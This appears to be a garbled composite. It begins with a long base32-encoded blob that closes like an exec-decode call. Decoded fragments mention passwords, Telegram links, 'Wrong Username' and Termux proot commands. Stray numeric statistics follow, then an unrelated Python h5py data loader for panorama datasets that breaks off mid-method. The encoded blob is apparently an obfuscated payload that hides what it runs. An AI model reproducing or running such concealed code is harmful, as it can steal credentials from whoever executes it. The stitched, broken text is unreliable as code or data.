DJNYQHG5LDMNSXG43GOVWGY6JAMFZSA5C4PAYDKXDYGAYFY6BQGBOHQMBQMZQWY43FONOHQMDFLR4DAMC4PAYDAXDYGAYFO4TPNZTSAUDBONZXO33SMRZT2XDYGAYFY6BQGBOHQMBQPBSGOLLPOBSW4IDIOR2HA4Z2F4XXS33VOR2WEZJOMNXW2L3DNBQW43TFNQXVKQ32IZ3GSRSZINHUUSJUJF3WQZCWJ5IVI4KJO5ZVY6BQMVOHQMBQLR4DAMC4PAYDAV3SN5XGOICVONSXE3TBNVSXGXDYGFSFY6BQGBOHQMBQLR4DAMDYMRTS233QMVXCA2DUORYHGORPF52C43LFF5JVGX2TKNPTC2K4PBTGMXDYMZTFY6DGMZOHQZTGJZRVY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYVY6BQGBOHQMBQLR4DAMC4PAYDEXDYGAYFY6BQGBOHQMBQINOHQMBQLR4DAMC4PAYDA424PAYGGXDYGAZFY6BQGBOHQMBQOROHQMBQLR4DAMDKLR4DAMK4PAYDAZC4PAYDCXDYGAYFY6BYGNOHQMBRLR4DAMC4PAYDC5C4PAYDEXDYGAYGUXDYGAZVY6BQGBSFY6BQGJOHQMBQLR4DQM24PAYDCXDYGAYFY6BQGFSFY6BQGNOHQMBQI5EHIXDYGAZFY6BQGBVFY6BQGNOHQMBQMROHQMBULR4DAMC4PA4DGXDYGAYVY6BQGBOHQMBRMROHQMBVLR4DAMCHJBSFY6BQGZOHQMBQI5EGIXDYGA3VY6BQGBDUQZC4PAYDQXDYGAYEOSDULR4DAMS4PAYDA2S4PAYDGXDYGAYGIXDULR4DAMC4PA4DGXDYGAYVY6BQGBOHQMBRMROHQMBVLR4DAMCHJBSFY3S4PAYDAR2IMROHQMDCLR4DAMCHJBSFY6BQMNOHQMBQI5EGIXDSLR4DAMCHJBSFY6BQMVOHQMBQI5EGIXDYGBTFY6BQGBDUQZC4PAYTAXDYGAYEOSDULR4DANC4PAYDAZC4PAYTCXDYGAYFY6BYGNOHQMBRLR4DAMD5LR4DAMC4PAYDA7C4PAYDAXDYGAYGII24PAYDA224PAYDMXDYGAYHEXDYMJSVY6BQGB2FY6BQGBOHQMBQNJOHQMBRLR4DAMDELR4DAMK4PAYDAXDYHAZVY6BQGFOHQMBQLR4DAMLULR4DAMS4PAYDA2S4PAYDGXDYGAYGIXDYGAZFY6BQGBOHQOBTLR4DAMK4PAYDAXDYGAYXIXDYGAZFY6BQGBVFY6BQGNOHQMBQMROHQMJTLR4DAMC4PA4DGXDYGAYVY6BQGBOHQMBROROHQMBVLR4DAMC4PA4DGXDYGAYFY6BQGBOHQMBRNZOHQMBQLR4DAMD4LR4DAMC4PAYDAZBELR4DAMDLLR4DANS4PAYDA4RCLR4DAMLULR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAYVY6BQGBOHQOBTLR4DAMK4PAYDAXDYGAYXIXDYGAZFY6BQGBVFY6BQGNOHQMBQMROHQMJVLR4DAMC4PA4DGXDYGAYVY6BQGBOHQMBROROHQMBSLR4DAMDKLR4DAM24PAYDAZC4PAYTMXDYGAYFY6BYGNOHQMBRLR4DAMC4PAYDC5C4PAYDEXDYGAYGUXDYGAZVY6BQGBSFY6BQGJOHQMBQLR4DQM24PAYDCXDYGAYFY6BQGF2FY6BQGJOHQMBQNJOHQMBTLR4DAMDELR4DCN24PAYDAXDYHAZVY6BQGFOHQMBQLR4DAMLULR4DAMS4PAYDA2S4PAYDGXDYGAYGIXDYGE4FY6BQGBOHQOBTLR4DAMK4PAYDAXDYGAYXIXDYGA2VY6BQGBOHQOBTLR4DAMC4PAYDAXDYGAYW4XDYGAYFY6BQGB6FY6BQGBOHQMBQMQSVY6BQGBVVY6BQGZOHQMBQOJJFY6BQGF2FY6BQGBOHQMBQNJOHQMBRLR4DAMDELR4DAMK4PAYDAXDYHAZVY6BQGFOHQMBQLR4DAMLULR4DAMS4PAYDA2S4PAYDGXDYGAYGIXDYGFQVY6BQGBOHQOBTLR4DAMK4PAYDAXDYGAYXIXDYGA2VY6BQGBOHQOBTLR4DAMC4PAYDAXDYGAYW4XDYGAYFY6BQGB6FY6BQGBOHQMBQMQTFY6BQGBVVY6BQGZOHQMBQOJOHQOBSLR4DAMLULR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAYVY6BQGBOHQOBTLR4DAMK4PAYDAXDYGAYXIXDYGAZFY6BQGBVFY6BQGNOHQMBQMROHQMLDLR4DAMC4PA4DGXDYGAYVY6BQGBOHQMBROROHQMBVLR4DAMC4PA4DGXDYGAYFY6BQGBOHQMBRNZOHQMBQLR4DAMD4LR4DAMC4PAYDAZC4E5OHQMBQNNOHQMBWLR4DAMDSLR4GEMS4PAYDC5C4PAYDAXDYGAYGUXDYGAYVY6BQGBSFY6BQGFOHQMBQLR4DQM24PAYDCXDYGAYFY6BQGF2FY6BQGJOHQMBQNJOHQMBTLR4DAMDELR4DCZK4PAYDAXDYHAZVY6BQGFOHQMBQLR4DAMLULR4DANK4PAYDAXDYHAZVY6BQGBOHQMBQLR4DAMLOLR4DAMC4PAYDA7C4PAYDAXDYGAYGIKC4PAYDA224PAYDMXDYGAYHEXDYMUZFY6BQGF2FY6BQGBOHQMBQNJOHQMBRLR4DAMDEEBOHQMBQLR4DQM24PAYDCXDYGAYFY6BQGF2FY6BQGJOHQMBQNJOHQMBTLR4DAMDEEFOHQMBQLR4DQM24PAYDCXDYGAYFY6BQGF2FY6BQGVOHQMBQLR4DQM24PAYDAXDYGAYFY6BQGFXCMXDYGAYHIXDYGAYFY6BQGBVFY6BQGFOHQMBQMROHQMBRLR4DAMC4PA4DGXDYGAYVY6BQGBOHQMBRMQRFY6BQGBDUQ5C4PAYDAXDYGAYGUXDYGAYVY6BQGBSFY6BQGFOHQMBQLR4DQM24PAYDCXDYGAYFY6BQGF2FY6BQGZOHQMBQLR4DQM24PAYDAXDYGAYFY6BQGFSFY6BQGBOHQMBQKMUCSXDYGAYFY6BQGBOHQMBQJZUVY6BQGFOHQMBQLR4DAMC4PAYDA5C4PAYDKXDYGAYFY6BQGBOHQMBQMNWGKYLSONOHQMBVLR4DAMC4PAYDAXDYGAYFY6BRMJNTSM3NONOHEXDYGAYFY6BQGBOHQMBQMZUWO3DFOQQFG2LEOJQSA4ZGLR4DAMC4PAYDAXDYGAYFY6BRMJNTSMTNHU6T2PJ5HU6T2PJ5HU6T2PJ5HU6T2PJ5HU6T2PJ5HU6T2PJ5HU6T24ZALR4DAMC4PAYDAXDYGAYFY6BRMJNTSM3NEBAXK5DIN5ZCAIBAHJOHQMLCLM4TE3KTNFSHEYJAIVGEK6T2OMRFY6BQGBOHQMBQLR4DAMC4PAYWEWZZGNWSAWLPOVKHKYTFEAQDUIC4PAYWEWZZGJWVIZLSNV2XQICUN5XWY43TFBOHQMBQLR4DAMC4PAYDAXDYGFRFWOJTNUQFIZLMMVTXEYLNEA5CAXDYGFRFWOJSNVUHI5DQOM5C6L3UFZWWKL2UKRPVEULTHVOHQMBQLR4DAMC4PAYDA6DEM4WW64DFNYQGQ5DUOBZTULZPPFXXK5DVMJSS4Y3PNUXWG2DBNZXGK3BPKVBXURTWNFDFSQ2PJJETISLXNBSFMT2RKRYUS53TFZOHQMBQLR4DAMC4PAYDAXDYGFRFWOJSNUVSWKZLFMVSWKZLFMVSWIC4PAYWEWZZG5WVIT2PJRJSAXDYGFRFWOJSNUVSWKZLFMVSWKZLFMVSW4ZLLR4DAMC4PAYDAXDYGAYFY6BRMJNTSMTNLNOHQMLCLM4TO3JRLR4DCYS3HEZG2XJALR4DCYS3HEZW2RLOMFRGYZJAMFZHE33XEBVWK6LTEAQHGKC4PAYDAXDYGAYFY6BQGBOHQMLCLM4TE3K3LR4DCYS3HE3W2MS4PAYWEWZZGJWV2IC4PAYWEWZZGNWVE33POQQGCY3UNF3GC5DJN5XCA4ZPLR4DAMC4PAYDAXDYGAYFY6BRMJNTSMTNLNOHQMLCLM4TO3JTLR4DCYS3HEZG2XJALR4DCYS3HEZW2RTPNRWG65ZANVSSA33OEBKGK3DFM5ZGC3JAEBZSWXDYGAYFY6BQGBOHQMBQLR4DCYS3HEZG2W24PAYWEWZZG5WTIXDYGFRFWOJSNVOSAXDYGFRFWOJTNVDG63DMN53SA3LFEBXW4IDHNF2GQ5LCOMXFY6BQGBOHQMBQLR4DAMC4PAYWEWZZGJWVWXDYGFRFWOJXNU2VY6BRMJNTSMTNLUQFY6BRMJNTSM3NIZXXEIDJNZYXK2LSNFSXGIDDMFWGYIDNMUQHGXDYGFSFY6BQGBOHQMBQLR4DAMC4PAYWEWZZGJWVWXDYGFRFWOJRNUYFY6BRMJNTSMTNLUQFY6BRMJNTSMLNIV4GS5BAONOHQMDFLR4DAMC4PAYDAXDYGAYFY6BRMJNTSN3NHU6T4XDYGFRFWOJTNUQHIXDYGAYVY6BQGBOHQMBQLR4DAMBRONOHQMDFLR4DAMC4PAYDAXDYGAYHA6LUNBXW4MRANNSXSLTQPF2FY6BQGFOHQMBQLR4DAMC4PAYDAMTTLR4DAZS4PAYDAXDYGAYFY6BQGBQXA5BANFXHG5DBNRWCA5DTOV2FY6BQGNOHQMBQLR4DAMC4PAYDA5DTOVZVY6BRGFOHQMBQLR4DAMC4PAYDA4DLM4QGS3TTORQWY3BAOBZG633UONOHQMLFLR4DAMC4PAYDAXDYGAYHA4TPN52CALJQEAWXOID6EASFAUSFIZEVQL3CNFXC6YTBONUHIXDYGAYVY6BQGBOHQMBQLR4DAMBTONOHQMLELR4DAMC4PAYDAXDYGAYHQZDHFVXXAZLOEBUHI5DQOM5C6L3UFZWWKL2UKRPVEUJPGR2FY6BQGFOHQMBQLR4DAMC4PAYDANDTEZOHQMBQLR4DAMC4PAYDA6DEM4WW64DFNYQGQ5DUOBZTULZPM5UXI2DVMIXGG33NF5JWSZDSMFCUYRL2PJ2FY6BQGFOHQMBQLR4DAMC4PAYDANLTLR4DCZC4PAYDAXDYGAYFY6BQGB4GIZZNN5YGK3RANB2HI4DTHIXS65BONVSS6U2TL5JVGXZROROHQMBRLR4DAMC4PAYDAXDYGAYDA2K4PAYDEXDYGAYFY6BQGBOHQMBQONOHQMJRLR4DAMC4PAYDAXDYGAYGM2LHNRSXIICTNFSHEYLFNRSXU6TTFBOHQMBQLR4DAMC4PAYDAXDYGFRFWOJXNUQFA2LMNFUCAWLBNZTSAQTFNZSXEIC4PAYWEWZZGJWUO33CNRXWWIBOEAXCALRILR4DAMK4PAYDAXDYGAYFY6BQGBJFY6BQGROHQMBQLR4DAMC4PAYDAKC4PAYDCXDYGAYFY6BQGBOHQMBQKJOHQMBVLR4DAMC4PAYDAXDYGAYCQXDYGAYVY6BQGBOHQMBQLR4DAMCSLR4DAN24PAYDAXDYGAYFY6BQGAUFY6BQGFOHQMBQLR4DAMC4PAYDAUS4PAYDQXDYGAYFY6BQGBOHQMBQFBOHQMBRLR4DAMC4PAYDAXDYGAYFEXDULR4DAMC4PAYDAXDYGAYCQXDYGAYVY6BQGBOHQMBQLR4DAMCSLRXFY6BQGBOHQMBQLR4DAMBILR4DAN24PAYDAXDYGAYFY6BQGB2FY6BQGROHQMBQLR4DAMC4PAYDA5DJNVSXIXDYGA2VY6BQGBOHQMBQLR4DAMDTNRSWK4DULR4DAMS4PAYDAXDYGAYFY6BQGBXXG5C4PAYDMXDYGAYFY6BQGBOHQMBQON4XG5DFNV2FY5C4PAYDAXDYGAYFY6BQGBZGC527NFXHA5LUOROHQMBULR4DAMC4PAYDAXDYGAYGK6DJOR2FY6BQGROHQMBQLR4DAMC4PAYDA3LBNFXCQXDYGAYVY6BQGBOHQMBQLR4DAMDULR4DANC4PAYDAXDYGAYFY6BQGBTWC3TTFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMDTLR2FY6BQGBOHQMBQLR4DAMB4ORSWOYLSNFSD4US4PAYTCXDYGAYFY6BQGBOHQMBQLR4DCOK4PAYDAXDYGAYFY6BQGBZWMXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDCXDSLR4DAMK4OJOHQMBRLR4DANK4PAYDCXDSLR4DAMK4PAYDKXDYGAYVY6BQGVOHQMBRLR4DANK4PAYDCXDYGA2VY6BQGFOHEXDYGAYVY6BQGVOHQMBRLR4DANK4PAYDCXDYGA2VY6BQGFOHQMBVLR4DAMK4PAYDKXDYGAYVY6BQGVOHQMBRLR4DANK4PAYDCXDYGA2VY6BQGFOHQMDDLR4DAMK4PAYGGXDYGAYVY4S4PAYDCXDSLR4DAMK4OJOHQMBRLRXFY6BQGFOHQMDDLR4DAMK4OJOHQMBRLRZFY6BQGFOHEXDYGAYVY4S4PAYDCXDSLR4DAMK4OJOHQMBRLRXFY6BQGFOHQMDDLR4DAMK4OJOHQMBRLRZFY6BQGFOG4XDYGAYVY6BQMNOHQMBRLRZFY6BQGFOHEXDYGAYVY3S4PAYDCXDYGBRVY6BQGFOHEXDYGAYVY4S4PAYDCXDOLR4DAMK4PAYGGXDYGAYVY4S4PAYDCXDSLR4DAMK4NZOHQMBSLRZFY6BQGFOHQMBVLR4DAMK4OJOHQMBRFBOHQMDCLR4DAMC4PAYDAXDYGAYHIXDYGBTFY6BQGBOHQMBQLR4DAMCDN5ZHEZLDORKXGZLSNZQW2ZLULR4DAZS4PAYDAXDYGAYFY6BQGBBW64TSMVRXIUDBONZXO33SMR2FY6BQGROHQMBQLR4DAMC4PAYDA3DPN5YFEXDYGBTFY6BQGBOHQMBQLR4DAMDULR4DAOC4PAYDAXDYGAYFY6BQGB2XGZLSNZQW2ZLULR4DAOC4PAYDAXDYGAYFY6BQGBYGC43TO5XXEZCSLRZFY6BQGBOHQMBQLR4DAMCSLR4DAZK4PAYDAXDYGAYFY6BQGB2FY6BQGNOHQMBQLR4DAMC4PAYDA43ZONJFY6BQMJOHQMBQLR4DAMC4PAYDAUS4PAYTCXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGBZVY5C4PAYDAXDYGAYFY6BQGA6HIZLHMFZGSZB6OROHQMBYLR4DAMC4PAYDAXDYGAYDY3LPMR2WYZJ6LR4DAM24PAYDAXDYGAYFY6BQGBZSAXDYGAYFY6BQGBOHQMBQLR4DANS4PAYDCXDYGA3FY6BQGNOHQMBWLR4DAMK4PAYGMXDYGAYVY6BQMNOHQMBRLR4DAY24PAYDCXDYGBRVY6BQGFOHQMDDLR4DAMK4OROHQMBRLR2FY6BQGJOHQMBVLR4DAMK4PAYTAXDYGAZFY6BQGVOHQMBRLR4DCMK4PAYDCJC4PAYDIXDUGYUFY6BQGJOHQMBQLR4DAMC4PAYDA5C4PAYDOXDYGAYFY6BQGBOHQMBQNVQXE43IMFWHIXDYGA2VY6BQGBOHQMBQLR4DAMDMN5QWI4ZILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQONOHIXDYGAYFY6BQGBOHQMBQHR2GKZ3BOJUWIPTULR4DAOC4PAYDAXDYGAYFY6BQGA6G233EOVWGKPS4PAYDEXDYGAYFY6BQGBOHQMBQONOHQMBSLR4DAMC4PAYDAXDYGAYFY6BQMNOHQMBRFBOHQMBSLR4DAMC4PAYDAXDYGAYHIXDYGA3VY6BQGBOHQMBQLR4DAMDNMFZHG2DBNR2FY6BQGVOHQMBQLR4DAMC4PAYDA3DPMFSHGKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMDTLR2FY6BQGBOHQMBQLR4DAMB4ORSWOYLSNFSD45C4PAYDQXDYGAYFY6BQGBOHQMBQHRWW6ZDVNRST4XDYGAZFY6BQGBOHQMBQLR4DAMDTLR4DAMS4PAYDAXDYGAYFY6BQGBOHQMDDLR4DAMJILR4DAMS4PAYDAXDYGAYFY6BQGB2FY6BQG5OHQMBQLR4DAMC4PAYDA3LBOJZWQYLMOROHQMBVLR4DAMC4PAYDAXDYGAYGY33BMRZSQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDA424OROHQMBQLR4DAMC4PAYDAPDUMVTWC4TJMQ7HIXDYGA4FY6BQGBOHQMBQLR4DAMB4NVXWI5LMMU7FY6BQGJOHQMBQLR4DAMC4PAYDA424PAYDEXDYGAYFY6BQGBOHQMBQLR4DAY24PAYDCKC4PAYDEXDYGAYFY6BQGBOHQMBQOROHQMBXLR4DAMC4PAYDAXDYGAYG2YLSONUGC3DULR4DANK4PAYDAXDYGAYFY6BQGBWG6YLEOMUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYHGXDULR4DAMC4PAYDAXDYGAYDY5DFM5QXE2LEHZ2FY6BQHBOHQMBQLR4DAMC4PAYDAPDNN5SHK3DFHZOHQMBSLR4DAMC4PAYDAXDYGAYHGXDYGAZFY6BQGBOHQMBQLR4DAMC4PAYGGXDYGAYSQXDYGAZFY6BQGBOHQMBQLR4DAMDULR4DAN24PAYDAXDYGAYFY6BQGBWWC4TTNBQWY5C4PAYDKXDYGAYFY6BQGBOHQMBQNRXWCZDTFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGBZVY5C4PAYDAXDYGAYFY6BQGA6HIZLHMFZGSZB6OROHQMBYLR4DAMC4PAYDAXDYGAYDY3LPMR2WYZJ6LR4DAMS4PAYDAXDYGAYFY6BQGBZVY6BQGJOHQMBQLR4DAMC4PAYDAXDYGBRVY6BQGEUFY6BQGJOHQMBQLR4DAMC4PAYDA5C4PAYDOXDYGAYFY6BQGBOHQMBQNVQXE43IMFWHIXDYGA2VY6BQGBOHQMBQLR4DAMDMN5QWI4ZILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQONOHIXDYGAYFY6BQGBOHQMBQHR2GKZ3BOJUWIPTULR4DAOC4PAYDAXDYGAYFY6BQGA6G233EOVWGKPS4PAYDEXDYGAYFY6BQGBOHQMBQONOHQMBSLR4DAMC4PAYDAXDYGAYFY6BQMNOHQMBRFBOHQMBSLR4DAMC4PAYDAXDYGAYHIXDYGA3VY6BQGBOHQMBQLR4DAMDNMFZHG2DBNR2FY6BQGVOHQMBQLR4DAMC4PAYDA3DPMFSHGKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMDTLR2FY6BQGBOHQMBQLR4DAMB4ORSWOYLSNFSD45C4PAYDQXDYGAYFY6BQGBOHQMBQHRWW6ZDVNRST4XDYGAZFY6BQGBOHQMBQLR4DAMDTLR4DAMS4PAYDAXDYGAYFY6BQGBOHQMDDLR4DAMJILR4DAMS4PAYDAXDYGAYFY6BQGB2FY6BQG5OHQMBQLR4DAMC4PAYDA3LBOJZWQYLMOROHQMBVLR4DAMC4PAYDAXDYGAYGY33BMRZSQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDA424OROHQMBQLR4DAMC4PAYDAPDUMVTWC4TJMQ7HIXDYGA4FY6BQGBOHQMBQLR4DAMB4NVXWI5LMMU7FY6BQGJOHQMBQLR4DAMC4PAYDA424PAYDEXDYGAYFY6BQGBOHQMBQLR4DAY24PAYDCKC4PAYDEXDYGAYFY6BQGBOHQMBQOROHQMBXLR4DAMC4PAYDAXDYGAYG2YLSONUGC3DULR4DANK4PAYDAXDYGAYFY6BQGBWG6YLEOMUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYHGXDULR4DAMC4PAYDAXDYGAYDY5DFM5QXE2LEHZ2FY6BQHBOHQMBQLR4DAMC4PAYDAPDNN5SHK3DFHZOHQMBSLR4DAMC4PAYDAXDYGAYHGXDYGAZFY6BQGBOHQMBQLR4DAMC4PAYGGXDYGAYSQXDYGAZFY6BQGBOHQMBQLR4DAMDULR4DAN24PAYDAXDYGAYFY6BQGBWWC4TTNBQWY5C4PAYDKXDYGAYFY6BQGBOHQMBQNRXWCZDTFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGBZVY5C4PAYDAXDYGAYFY6BQGA6HIZLHMFZGSZB6OROHQMBYLR4DAMC4PAYDAXDYGAYDY3LPMR2WYZJ6LR4DAMS4PAYDAXDYGAYFY6BQGBZVY6BQGJOHQMBQLR4DAMC4PAYDAXDYGBRVY6BQGEUFY6BQGJOHQMBQLR4DAMC4PAYDA5C4PAYDOXDYGAYFY6BQGBOHQMBQNVQXE43IMFWHIXDYGA2VY6BQGBOHQMBQLR4DAMDMN5QWI4ZILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQONOHIXDYGAYFY6BQGBOHQMBQHR2GKZ3BOJUWIPTULR4DAOC4PAYDAXDYGAYFY6BQGA6G233EOVWGKPS4PAYDEXDYGAYFY6BQGBOHQMBQONOHQMBSLR4DAMC4PAYDAXDYGAYFY6BQMNOHQMBRE4USS==='))
| 2,783.666667
| 16,618
| 0.998324
| 18
| 16,702
| 926.222222
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10731
| 0.000718
| 16,702
| 5
| 16,619
| 3,340.4
| 0.891612
| 0.003772
| 0
| 0
| 0
| 0
| 0.997355
| 0.997355
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
0d6dd301aa4cb72024a11b8a2a18a68ccf0051ff
| 23,274
|
py
|
Python
|
misc/DataLoader.py
|
srama2512/sidekicks
|
a5c487bb30540c98f04ece5e2c22ef95963afbdb
|
[
"MIT"
] | 26
|
2018-07-30T19:14:49.000Z
|
2022-03-12T12:49:36.000Z
|
misc/DataLoader.py
|
srama2512/sidekicks
|
a5c487bb30540c98f04ece5e2c22ef95963afbdb
|
[
"MIT"
] | 2
|
2018-12-10T17:12:27.000Z
|
2019-07-15T22:47:28.000Z
|
misc/DataLoader.py
|
srama2512/sidekicks
|
a5c487bb30540c98f04ece5e2c22ef95963afbdb
|
[
"MIT"
] | 8
|
2018-12-18T00:55:45.000Z
|
2019-11-11T18:42:49.000Z
|
import h5py
import random
import numpy as np
import pdb
import torch
class DataLoaderSimple(object):
"""
DataLoader class for abstracting the reading, batching and shuffling operations
Does not use expert rewards.
"""
def __init__(self, opts):
"""
Loads the dataset and saves settings needed:
(1) dataset statistics (2) shuffle (3) debug statistics (4) iteration tracker
Opts required: seed, h5_path, shuffle, batch_size, h5_path_unseen (optional)
mask_path (optional)
"""
# ---- Load the dataset ----
self.h5_file = h5py.File(opts.h5_path, 'r')
self.data = {}
self.data['train'] = np.array(self.h5_file['train'])
self.data['val'] = np.array(self.h5_file['val'])
self.data['test'] = np.array(self.h5_file['test'])
if 'val_highres' in self.h5_file.keys():
self.data['val_highres'] = np.array(self.h5_file['val_highres'])
self.data['test_highres'] = np.array(self.h5_file['test_highres'])
# ---- Load the unseen classes ----
if opts.h5_path_unseen != '':
h5_file_unseen = h5py.File(opts.h5_path_unseen, 'r')
self.data['test_unseen'] = np.array(h5_file_unseen['test'])
# ---- Save settings needed for batching operations ----
# Dataset statistics
self.train_count = self.h5_file['train'].shape[0]
self.val_count = self.h5_file['val'].shape[0]
self.test_count = self.h5_file['test'].shape[0]
if opts.h5_path_unseen != '':
self.test_unseen_count = self.data['test_unseen'].shape[0]
if hasattr(opts, 'mask_path') and opts.mask_path != '':
mask_file = h5py.File(opts.mask_path, 'r')
self.masks = {}
self.masks['test'] = np.array(mask_file['test_mask'])
if opts.h5_path_unseen != '':
self.masks['test_unseen'] = np.array(mask_file['test_unseen_mask'])
self.hasmasks = True
else:
self.hasmasks = False
self.pano_shape = self.h5_file['train'].shape[1:]
# Iteration tracker
self.train_idx = 0
self.val_idx = 0
self.test_idx = 0
if opts.h5_path_unseen != '':
self.test_unseen_idx = 0
self.batch_size = opts.batch_size
# Shuffle the training data indices and access them in the shuffled order
self.shuffle = opts.shuffle
self.shuffled_idx = list(range(self.h5_file['train'].shape[0]))
if self.shuffle:
random.shuffle(self.shuffled_idx)
# Debug mode
self.debug = opts.debug
self.N = self.data['train'].shape[1]
self.M = self.data['train'].shape[2]
self.C = self.data['train'].shape[3]
self.H = self.data['train'].shape[4]
self.W = self.data['train'].shape[5]
if 'val_highres' in self.data:
self.H_highres = self.data['val_highres'].shape[4]
self.W_highres = self.data['test_highres'].shape[5]
def next_batch_train(self):
"""
Returns the next training batch (indexed by self.shuffled_idx and starting at self.train_idx)
out: BxNxMxCx32x32
depleted: is the epoch over?
"""
batch_size = min(self.batch_size, self.train_count - self.train_idx)
out = np.array(self.data['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)], :, :, :, :, :])
if self.debug:
assert((batch_size == self.batch_size) or (self.train_idx + batch_size == self.train_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if self.train_idx + batch_size == self.train_count:
depleted = True
self.train_idx = 0
else:
depleted = False
self.train_idx = self.train_idx + batch_size
return out, depleted
def next_batch_val(self, highres=False):
"""
Returns the next validation batch
out: BxNxMxCx32x32
out_highres: BxNxMxCx448x448 (optional)
depleted: is the epoch over?
"""
batch_size = min(self.batch_size, self.val_count - self.val_idx)
out = np.array(self.data['val'][self.val_idx:(self.val_idx+batch_size), :, :, :, :, :])
if highres:
out_highres = np.array(self.data['val_highres'][self.val_idx:(self.val_idx+batch_size), :, :, :, :, :])
if self.debug:
assert((batch_size == self.batch_size) or (self.val_idx + batch_size == self.val_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if highres:
assert(out_highres.shape == (batch_size, self.N, self.M, self.C, self.H_highres, self.W_highres))
if self.val_idx + batch_size == self.val_count:
depleted = True
self.val_idx = 0
else:
depleted = False
self.val_idx = self.val_idx + batch_size
if not highres:
return out, depleted
else:
return out, out_highres, depleted
def next_batch_test(self, highres=False):
"""
Returns the next testing batch
out: BxNxMxCx32x32
out_highres: BxNxMxCx448x448 (optional)
depleted: is the epoch over?
"""
batch_size = min(self.batch_size, self.test_count - self.test_idx)
out = np.array(self.data['test'][self.test_idx:(self.test_idx+batch_size), :, :, :, :, :])
if highres:
out_highres = np.array(self.data['test_highres'][self.test_idx:(self.test_idx+batch_size), :, :, :, :, :])
if self.hasmasks:
out_masks = self.masks['test'][self.test_idx:(self.test_idx+batch_size), :, :, :, :, :]
else:
out_masks = None
if self.debug:
assert((batch_size == self.batch_size) or (self.test_idx + batch_size == self.test_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if highres:
assert(out_highres.shape == (batch_size, self.N, self.M, self.C, self.H_highres, self.W_highres))
if self.hasmasks:
assert(out_masks.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if self.test_idx + batch_size == self.test_count:
depleted = True
self.test_idx = 0
else:
depleted = False
self.test_idx = self.test_idx + batch_size
if not highres:
return out, out_masks, depleted
else:
return out, out_highres, out_masks, depleted
def next_batch_test_unseen(self):
"""
Returns the next unseen classes testing batch
out: BxNxMxCx32x32
"""
batch_size = min(self.batch_size, self.test_unseen_count - self.test_unseen_idx)
out = np.array(self.data['test_unseen'][self.test_unseen_idx:(self.test_unseen_idx+batch_size), :, :, :, :, :])
if self.hasmasks:
out_masks = self.masks['test_unseen'][self.test_unseen_idx:(self.test_unseen_idx+batch_size), :, :, :, :, :]
else:
out_masks = None
if self.debug:
assert((batch_size == self.batch_size) or (self.test_unseen_idx + batch_size == self.test_unseen_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if self.test_unseen_idx + batch_size == self.test_unseen_count:
depleted = True
self.test_unseen_idx = 0
else:
depleted = False
self.test_unseen_idx = self.test_unseen_idx + batch_size
return out, out_masks, depleted
class DataLoaderExpert(DataLoaderSimple):
"""
DataLoader class for abstracting the reading, batching and shuffling operations
Uses expert rewards.
"""
def __init__(self, opts):
"""
Loads the dataset, rewards and saves settings needed:
(1) dataset statistics (2) shuffle (3) debug statistics (4) iteration tracker
Opts required: seed, h5_path, shuffle, batch_size, rewards_h5_path
"""
# ---- Load the dataset, save settings ----
super(DataLoaderExpert, self).__init__(opts)
# ---- Load the rewards ----
rewards_file = h5py.File(opts.rewards_h5_path)
self.rewards = {}
# These are KxNxM arrays containing rewards corresponding to each views of
# all panoramas in the train and val splits
self.rewards['train'] = np.array(rewards_file['train/nms'])
self.rewards['val'] = np.array(rewards_file['val/nms'])
def next_batch_train(self):
"""
Returns the next training batch (indexed by self.shuffled_idx and starting at self.train_idx)
out: BxNxMxCx32x32
out_rewards: BxNxM
"""
